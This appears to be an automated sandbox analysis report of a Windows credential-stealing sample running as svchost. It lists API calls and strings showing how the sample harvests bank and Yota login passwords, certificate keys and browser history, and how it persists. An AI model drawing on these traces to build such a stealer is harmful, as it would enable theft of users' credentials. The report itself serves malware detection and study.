Download Yara Rule

APIs

Part of subcall function 02D07A00: IsUserAnAdmin.SHELL32 ref: 02D07A0A
Part of subcall function 02D07A00: memset.MSVCRT ref: 02D07A41
Part of subcall function 02D07A00: memset.MSVCRT ref: 02D07A59
Part of subcall function 02D07A00: RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,7591F380), ref: 02D07A7B
Part of subcall function 02D07A00: RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,7591F380), ref: 02D07AA1
Part of subcall function 02D07A00: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,7591F380), ref: 02D07B2D
Part of subcall function 02D07A00: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,7591F380), ref: 02D07B34

OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02D07E85
Sleep.KERNEL32(00000064), ref: 02D07E92
OpenMutexA.KERNEL32(00100000,00000000,Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}), ref: 02D07EA4
ReleaseMutex.KERNEL32(00000000), ref: 02D07EAD
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D07EC5
CloseHandle.KERNEL32(00000000), ref: 02D07ED7
GetProcessHeap.KERNEL32(00000000,00000000,A3B7F9A2a,a3b7f923a), ref: 02D07EE2
HeapValidate.KERNEL32(00000000), ref: 02D07EE5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D07EF2
HeapFree.KERNEL32(00000000), ref: 02D07EF5
GetProcessHeap.KERNEL32(00000000,00000000,A3B7F9A2a,a3b7f923a), ref: 02D07F02
HeapValidate.KERNEL32(00000000), ref: 02D07F05
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D07F12
HeapFree.KERNEL32(00000000), ref: 02D07F15
SetCaretBlinkTime.USER32(000000FF), ref: 02D07F27
Sleep.KERNEL32(000001F4), ref: 02D07F55
StrToIntA.SHLWAPI(00000000,A3B7F9A2a,a3b7f923a), ref: 02D07F85
GetProcessHeap.KERNEL32(00000000,00000000,A3B7F9A2a,a3b7f923a), ref: 02D07F95
HeapValidate.KERNEL32(00000000), ref: 02D07F98
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D07FA5
HeapFree.KERNEL32(00000000), ref: 02D07FA8
GetProcessHeap.KERNEL32(00000000,00000000,A3B7F9A2a,a3b7f923a), ref: 02D07FB5
HeapValidate.KERNEL32(00000000), ref: 02D07FB8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D07FC5
HeapFree.KERNEL32(00000000), ref: 02D07FC8
Sleep.KERNEL32(00001388,A3B7F9A2a,a3b7f923a), ref: 02D07FD3
closesocket.WS2_32(?), ref: 02D08005
HeapFree.KERNEL32(00000000,00000000,?), ref: 02D08025
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02D0803D
ReleaseMutex.KERNEL32(00000000), ref: 02D0804F
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D08072
CloseHandle.KERNEL32(00000000), ref: 02D0808C

Strings

Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}, xrefs: 02D07E7A, 02D07E98
A3B7F9A2a, xrefs: 02D07E5A, 02D07F6E
a3b7f923a, xrefs: 02D07E50, 02D07F64

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$HandleMutexValidate$OpenSleep$CloseInformationReleasememset$AdminAllocBlinkCaretQueryTimeUserValueclosesocket
String ID: A3B7F9A2a$Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}$a3b7f923a
API String ID: 2871222221-896812464
Opcode ID: 81032ce3aef69fd289bef1c94426a49fb3d80e32131e63115c6636076be93e6c
Instruction ID: d59df135d20302879be9f4e16c4a7845d9d9d67af4e1be43b3f1d802424434b2
Opcode Fuzzy Hash: 81032ce3aef69fd289bef1c94426a49fb3d80e32131e63115c6636076be93e6c
Instruction Fuzzy Hash: F951C474A84311ABF7206F70AC8CF5BBBA9EF41755F544A04F9099A3D0DBB0EC10CAA1

Function 02D1C350 Relevance: 58.0, APIs: 25, Strings: 8, Instructions: 268fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D1C36F
PathAddBackslashA.SHLWAPI(5C590552), ref: 02D1C3A7
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D1C3E7
GetLastError.KERNEL32 ref: 02D1C3F1
IsUserAnAdmin.SHELL32 ref: 02D1C3F9
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1C40A
SetLastError.KERNEL32(00000000), ref: 02D1C411
StrStrIA.SHLWAPI(?,crypto), ref: 02D1C423
StrStrIA.SHLWAPI(?,self.cer), ref: 02D1C436
StrStrIA.SHLWAPI(?,self.pub), ref: 02D1C447
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D1C492
DeleteFileA.KERNEL32(?), ref: 02D1C49F

Strings

path.txt, xrefs: 02D1C46F
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}, xrefs: 02D1C5B4
5C590552, xrefs: 02D1C3A2, 02D1C3AD, 02D1C502, 02D1C50D
keys.zip, xrefs: 02D1C54B
crypto, xrefs: 02D1C41D
\t, xrefs: 02D1C3A7, 02D1C507
self.cer, xrefs: 02D1C42B
self.pub, xrefs: 02D1C43F

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorFileLastPath$AdminAttributesBackslashCreateDeleteDirectoryFolderMakeSystemUsermemset
String ID: 5C590552$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}$crypto$keys.zip$path.txt$self.cer$self.pub$\t
API String ID: 3980609930-305259209
Opcode ID: 6065259e704b968a1fa26d0ee4584f657ac82e81eb0349e377aed73e279debec
Instruction ID: 8aaef62c80b3a1a989e934ef31bcd9c48d4ec2cc8ed709210d9dd647597db775
Opcode Fuzzy Hash: 6065259e704b968a1fa26d0ee4584f657ac82e81eb0349e377aed73e279debec
Instruction Fuzzy Hash: 30915434D84258AFEB218F74B858BEE3BE5AF49704F044596E849D7740DB70AD44CBA2

Function 02D12340 Relevance: 54.6, APIs: 23, Strings: 8, Instructions: 351fileCOMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,?), ref: 02D1235C
PathAddBackslashA.SHLWAPI(?), ref: 02D12367
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,02D12B46,02D12B47), ref: 02D123C3
PathAddBackslashA.SHLWAPI(?), ref: 02D123CE
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 02D12423
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02D12447
SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 02D12461

Strings

***************************, xrefs: 02D124B5
HH:mm:ss, xrefs: 02D12518
dd:MMM:yyyy, xrefs: 02D1257C
A3B7FBD4a, xrefs: 02D123D4
) - , xrefs: 02D125D8
\t, xrefs: 02D12367, 02D123CE
***************************, xrefs: 02D1263D
a3b7fb16a, xrefs: 02D1236D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Path$File$BackslashCreateFolder$Pointer
String ID: ***************************$ ***************************$) - $A3B7FBD4a$HH:mm:ss$a3b7fb16a$dd:MMM:yyyy$\t
API String ID: 1731142794-406877789
Opcode ID: 513c050714ada65664f6b6bbdbee177b0ca0ae7264acd94c12ace51641ad29ba
Instruction ID: 776ff1098843c0a69498c746854876fefcc7684e7bddd30589e721d96ba50cd6
Opcode Fuzzy Hash: 513c050714ada65664f6b6bbdbee177b0ca0ae7264acd94c12ace51641ad29ba
Instruction Fuzzy Hash: 35B127316443967BDB218F24ACA9BAB7BE5EB85704F104518FEC59B3C0DB72AD09C790

Function 02D240E0 Relevance: 54.5, APIs: 24, Strings: 7, Instructions: 221stringsynchronizationsleepCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 02D24123
strstr.MSVCRT ref: 02D24136
strstr.MSVCRT ref: 02D24149
PathAddBackslashA.SHLWAPI(02D5D2A0), ref: 02D24177
PathAddBackslashA.SHLWAPI(02D5D2A0), ref: 02D241AD
CreateDirectoryA.KERNEL32(?,00000000,?), ref: 02D2420D
GetLastError.KERNEL32 ref: 02D24217
IsUserAnAdmin.SHELL32 ref: 02D2421F
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D24230
SetLastError.KERNEL32(00000000), ref: 02D24237
SetCurrentDirectoryA.KERNEL32(?), ref: 02D24244
strstr.MSVCRT ref: 02D24277
PathAddBackslashA.SHLWAPI(02D5D2A0), ref: 02D242A7
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D242E1
GetLastError.KERNEL32 ref: 02D242EB
IsUserAnAdmin.SHELL32 ref: 02D242F3
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D24304
SetLastError.KERNEL32(00000000), ref: 02D2430B
SetCurrentDirectoryA.KERNEL32(?), ref: 02D24318
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214},00000000,00000001), ref: 02D2434E
Sleep.KERNEL32(000003E8), ref: 02D2435F
ReleaseMutex.KERNEL32(00000000), ref: 02D24366
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D24378
CloseHandle.KERNEL32(00000000), ref: 02D24389

Strings

pass.txt, xrefs: 02D2425D
IDToken1=, xrefs: 02D24130
YotaConfirmForm%5Bpassword%5D, xrefs: 02D24271
login.yota.ru, xrefs: 02D2411D
IDToken2=, xrefs: 02D24143
pass2.txt, xrefs: 02D24331
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}, xrefs: 02D2433B

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Path$DirectoryErrorLaststrstr$BackslashCreate$AdminCurrentFolderHandleMakeMutexSystemUser$CloseInformationReleaseSleep
String ID: IDToken1=$IDToken2=$Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}$YotaConfirmForm%5Bpassword%5D$login.yota.ru$pass.txt$pass2.txt
API String ID: 1263884631-1052718204
Opcode ID: 4408a1899ce4efdc077e5f2c5f56ae8aff23c493c8e46ff13a904085445f39b9
Instruction ID: e4059bce474ec68096d9053a5789ee7c28b973e94839e7e792ac6d39a93c7c89
Opcode Fuzzy Hash: 4408a1899ce4efdc077e5f2c5f56ae8aff23c493c8e46ff13a904085445f39b9
Instruction Fuzzy Hash: D2710334A402256BDB219F74BC687EA7BE9AF61309F548554ECC6D7340DFB09D88CBA0

Function 02D1E630 Relevance: 54.5, APIs: 26, Strings: 5, Instructions: 220memorysynchronizationsleepCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D1E64E
PathAddBackslashA.SHLWAPI(5c59043a), ref: 02D1E67A
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D1E6BD
GetLastError.KERNEL32 ref: 02D1E6C3
IsUserAnAdmin.SHELL32 ref: 02D1E6CB
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D1E6DC
SetLastError.KERNEL32(00000000), ref: 02D1E6E3
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D1E71B
DeleteFileA.KERNEL32(?), ref: 02D1E728
PathAddBackslashA.SHLWAPI(5c59043a,?,?), ref: 02D1E767
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 02D1E7A5
GetLastError.KERNEL32 ref: 02D1E7AC
IsUserAnAdmin.SHELL32 ref: 02D1E7B4
PathMakeSystemFolderA.SHLWAPI(00000000), ref: 02D1E7C5
SetLastError.KERNEL32(00000000), ref: 02D1E7CC
GetFileAttributesA.KERNEL32(?), ref: 02D1E806
SetCurrentDirectoryA.KERNEL32(?), ref: 02D1E831
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214},00000000,?), ref: 02D1E855
Sleep.KERNEL32(000003E8), ref: 02D1E866
ReleaseMutex.KERNEL32(00000000), ref: 02D1E86D
GetHandleInformation.KERNEL32(00000000,?), ref: 02D1E87F
CloseHandle.KERNEL32(00000000), ref: 02D1E890
GetProcessHeap.KERNEL32(00000000,?), ref: 02D1E89F
HeapValidate.KERNEL32(00000000), ref: 02D1E8A2
GetProcessHeap.KERNEL32(00000000,?), ref: 02D1E8AF
HeapFree.KERNEL32(00000000), ref: 02D1E8B2

Strings

path.txt, xrefs: 02D1E6F8
keys.zip, xrefs: 02D1E7E8
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}, xrefs: 02D1E84C
\t, xrefs: 02D1E67A, 02D1E767
5c59043a, xrefs: 02D1E675, 02D1E680, 02D1E762, 02D1E76D

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorHeapLastPath$CreateDirectoryFile$AdminAttributesBackslashFolderHandleMakeMutexProcessSystemUser$CloseCurrentDeleteFreeInformationReleaseSleepValidatememset
String ID: 5c59043a$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}$keys.zip$path.txt$\t
API String ID: 1472338570-2240857495
Opcode ID: fcc57ca3f5f3146d47f92d692f891e6c75df1d5c7d3de3ddf71dce7964f40bae
Instruction ID: cd9d7f0cf8e10ef5ef3f22eb8048e233f57992d2c93f8cc8f294b519ba720235
Opcode Fuzzy Hash: fcc57ca3f5f3146d47f92d692f891e6c75df1d5c7d3de3ddf71dce7964f40bae
Instruction Fuzzy Hash: C2710F38940355AFEB218F34B868BEA3BE8AF95705F588994ED85C7341DB70DD44CBA0

Function 02D05AE0 Relevance: 52.8, APIs: 24, Strings: 6, Instructions: 272filememoryCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(?,?,00000000,74E1A250), ref: 02D05B11
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D05B4D
DeleteFileA.KERNEL32(?), ref: 02D05B5A
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02D05B79
SHGetFolderPathA.SHELL32(00000000,00000022,00000000,00000000,?), ref: 02D05B99
GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 02D05C20
HeapValidate.KERNEL32(00000000), ref: 02D05C23
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D05C30
HeapFree.KERNEL32(00000000), ref: 02D05C33
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02D05C48
GetProcessHeap.KERNEL32(00000000,00000000,?,00000001), ref: 02D05CD2
HeapValidate.KERNEL32(00000000), ref: 02D05CD5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D05CE2
HeapFree.KERNEL32(00000000), ref: 02D05CE5
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D05D32
LockFile.KERNEL32(00000000,00000000,00000000,02D13674,00000000), ref: 02D05D41
WriteFile.KERNEL32(00000000,02D1365B,02D13674,00000000,00000000), ref: 02D05D56
UnlockFile.KERNEL32(00000000,00000000,00000000,02D13674,00000000), ref: 02D05D63
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D05D7A
LockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D05D8A
WriteFile.KERNEL32(00000000,02D45CF4,00000002,00000000,00000000), ref: 02D05D9E
UnlockFile.KERNEL32(00000000,00000000,00000000,00000002,00000000), ref: 02D05DAC
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D05DD2
CloseHandle.KERNEL32(00000000), ref: 02D05DE3

Strings

http, xrefs: 02D05BF0
http, xrefs: 02D05CA0
\Opera\Opera\typed_history.xml, xrefs: 02D05C6D
\t, xrefs: 02D05B11
links.log, xrefs: 02D05B28
\History.IE5\index.dat, xrefs: 02D05BBD

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: File$Heap$Process$Path$FolderFreeHandleLockPointerUnlockValidateWrite$AttributesBackslashCloseCreateDeleteInformation
String ID: \History.IE5\index.dat$\Opera\Opera\typed_history.xml$http$http$links.log$\t
API String ID: 2678947633-3768590158
Opcode ID: 5f7c0368b33179716226988297c0454bcf5407980fdeb51d64126b75084ed7df
Instruction ID: 361b8a841a6d6b78234a04419ef9901038e6f56032dcc78e7393e8673dd6d029
Opcode Fuzzy Hash: 5f7c0368b33179716226988297c0454bcf5407980fdeb51d64126b75084ed7df
Instruction Fuzzy Hash: 5F91B275940209BBDB209F60ACC9F9B7BA9FB44704F904545EA45AB3D0DB70AE45CFA0

Function 02D0A8A0 Relevance: 51.0, APIs: 27, Strings: 2, Instructions: 290COMMON

Download Yara Rule

Strings

taskmgr, xrefs: 02D0AA87
open, xrefs: 02D0AA8C

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: open$taskmgr
API String ID: 0-1543563666
Opcode ID: 880194e253a626b8121f8963bfb9e96f5188dcc4eaf73a1f53c2eb8e5e9ebc3f
Instruction ID: 664c3c5a370a69ada8dc6d0657ac4618f224f237e0c2d6a3252b3882b1dcce25
Opcode Fuzzy Hash: 880194e253a626b8121f8963bfb9e96f5188dcc4eaf73a1f53c2eb8e5e9ebc3f
Instruction Fuzzy Hash: 3991D439E40308EFC710DF64F8C8EAAB7A8EB59326F904555FA45A7390C7719C60CBA0

Function 004028B0 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 223memorylibraryloaderCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(00401F70,?,0000001C,755CDB30,00000000,00000000), ref: 004028EB
GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402903
PathFileExistsA.SHLWAPI(?), ref: 00402924
GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040293C
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0040297D
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040298D
GetCurrentProcess.KERNEL32(?), ref: 0040299E
GetTickCount.KERNEL32 ref: 004029D6

Part of subcall function 00401600: GetTickCount.KERNEL32 ref: 0040160B
Part of subcall function 00401600: GetModuleHandleA.KERNEL32(ntdll.dll,?,004029E2,00000000), ref: 0040161C
Part of subcall function 00401600: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 0040162C

Part of subcall function 00401920: GetTickCount.KERNEL32 ref: 0040194A
Part of subcall function 00401920: GetModuleHandleA.KERNEL32(ntdll.dll,?,004029EE,-00000006,00000000), ref: 00401957
Part of subcall function 00401920: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401963

_snprintf.MSVCRT ref: 00402A50
CopyFileA.KERNEL32(?,?,00000001), ref: 00402A68
RtlImageNtHeader.NTDLL(00000000), ref: 00402A9A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402AC5
HeapValidate.KERNEL32(00000000), ref: 00402AC8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402AD4
HeapFree.KERNEL32(00000000), ref: 00402AD7
MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402AF6
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B05
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B15
GetCurrentProcess.KERNEL32(?), ref: 00402B26
GlobalFindAtomA.KERNEL32(Tue Aug 2 12:53:17 20111), ref: 00402B44
ExitProcess.KERNEL32 ref: 00402B55
GlobalAddAtomA.KERNEL32(Tue Aug 2 12:53:17 20111), ref: 00402B60

Strings

kernel32.dll, xrefs: 00402971, 00402AFC
\apppatch\, xrefs: 0040294F
IsWow64Process, xrefs: 00402987, 00402B0F
%s_, xrefs: 00402A3E
svchost.exe, xrefs: 004029BA
.exe, xrefs: 00402A28
Tue Aug 2 12:53:17 20111, xrefs: 00402B3F, 00402B5B

Memory Dump Source

Source File: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3269898642.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
String ID: %s_$.exe$IsWow64Process$Tue Aug 2 12:53:17 20111$\apppatch\$kernel32.dll$svchost.exe
API String ID: 4049655197-1703505012
Opcode ID: 316ab541766f69de20ede4138c7f30c1feb611c6e1e8b9ea983fb4f01bd77043
Instruction ID: 7f5ae7708a7b69610b0b59458e4d7764c7ebe7900fbd9078b2849b4018493b30
Opcode Fuzzy Hash: 316ab541766f69de20ede4138c7f30c1feb611c6e1e8b9ea983fb4f01bd77043
Instruction Fuzzy Hash: 6A715EB16043419FC710EF60DE889AB7BE8BB98300F44493EF785B72A1D7789904CB99

Function 02D1AFC0 Relevance: 51.0, APIs: 25, Strings: 4, Instructions: 214fileCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5c590506), ref: 02D1B008
CreateDirectoryA.KERNEL32(02D5DEC0,00000000), ref: 02D1B048
GetLastError.KERNEL32 ref: 02D1B04E
IsUserAnAdmin.SHELL32 ref: 02D1B056
PathMakeSystemFolderA.SHLWAPI(02D5DEC0), ref: 02D1B065
SetLastError.KERNEL32(00000000), ref: 02D1B06C
SetFileAttributesA.KERNEL32(02D5DEC0,00000000), ref: 02D1B0A1
DeleteFileA.KERNEL32(02D5DEC0), ref: 02D1B0AC
PathAddBackslashA.SHLWAPI(5c590506,00000000,00000001), ref: 02D1B0F6

Strings

5c590506, xrefs: 02D1B003, 02D1B00E, 02D1B0F1, 02D1B0FC
path.txt, xrefs: 02D1B080
\t, xrefs: 02D1B008, 02D1B0F6
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}, xrefs: 02D1B1CD

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: Path$BackslashErrorFileLast$AdminAttributesCreateDeleteDirectoryFolderMakeSystemUser
String ID: 5c590506$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$path.txt$\t
API String ID: 2920098687-4134113891
Opcode ID: 431c0304cb6497fb774e186ea0edbb43c0e7f6f1c791f133e73aecceb6b68cb2
Instruction ID: 06a9d49b4f1d0eab90c44586f895f3d636f22944c718a11667f638e5b12ff918
Opcode Fuzzy Hash: 431c0304cb6497fb774e186ea0edbb43c0e7f6f1c791f133e73aecceb6b68cb2
Instruction Fuzzy Hash: FB612534A40655BBEB114F34B868BAB3BD6EF5A749F548542EC86CB740DBA08C48C7A0

Function 02D17E00 Relevance: 49.4, APIs: 24, Strings: 4, Instructions: 391fileCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 02D17F62
malloc.MSVCRT ref: 02D17FC3
sprintf.MSVCRT ref: 02D17FD2
calloc.MSVCRT ref: 02D17FDC
fopen.MSVCRT ref: 02D17FE9
sprintf.MSVCRT ref: 02D17FFF
fopen.MSVCRT ref: 02D1800A
free.MSVCRT(00000000), ref: 02D1801C
free.MSVCRT(00000000), ref: 02D1801F
free.MSVCRT(00000000), ref: 02D1802B
malloc.MSVCRT ref: 02D18051
fread.MSVCRT ref: 02D1805F
fclose.MSVCRT ref: 02D1806E
free.MSVCRT(00000000), ref: 02D1807B
free.MSVCRT(00000000), ref: 02D1807E
malloc.MSVCRT ref: 02D180E1
realloc.MSVCRT ref: 02D180EC
fseek.MSVCRT ref: 02D18101
fread.MSVCRT ref: 02D18111
fclose.MSVCRT ref: 02D18122
malloc.MSVCRT ref: 02D1813E
malloc.MSVCRT ref: 02D18147
malloc.MSVCRT ref: 02D18150
malloc.MSVCRT ref: 02D1815C

Strings

rb+, xrefs: 02D17EAE, 02D17F49
r+b, xrefs: 02D17EDE
%s.dbf, xrefs: 02D17FCC
%s.DBF, xrefs: 02D17FF9

Memory Dump Source

Source File: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D00000, based on PE: true

Associated: 00000002.00000002.3273788686.0000000002D59000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3273788686.0000000002D5E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2d00000_svchost.jbxd

Yara matches

Similarity

API ID: malloc$free$fclosefopenfreadsprintf$callocfseekrealloc
String ID: %s.DBF$%s.dbf$r+b$rb+
API String ID: 3942648141-1626032180
Opcode ID: ceb619c8fa7899ef27855cc22855de1c515b737fd8da5128151d90fc4595cb69
Instruction ID: 569bf26a2def1edc4cb05cddb7a7f3ce9fcae66e4d6dcb0b6dd01093a2b4cad0
Opcode Fuzzy Hash: ceb619c8fa7899ef27855cc22855de1c515b737fd8da5128151d90fc4595cb69
Instruction Fuzzy Hash: 5BD14AB1A042416BE7218F38ACD47B7FFF6AF46214B584699E885CB792E732DD08C750

Function 004034E9 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 292memoryfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,755CDB30,00000000), ref: 0040351B
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,755CDB30,00000000), ref: 00403567
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,755CDB30,00000000), ref: 0040356E
memset.MSVCRT ref: 00403586
_snwprintf.MSVCRT ref: 004035A0
CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004035C3
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004035DA
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004035EE
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00403643
wcsstr.MSVCRT ref: 00403662
wcsstr.MSVCRT ref: 00403695
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040372B
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040375C
SetEndOfFile.KERNEL32(00000000), ref: 00403763
CloseHandle.KERNEL32(00000000), ref: 0040376A
VariantInit.OLEAUT32(00000000), ref: 0040379B
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004037F7
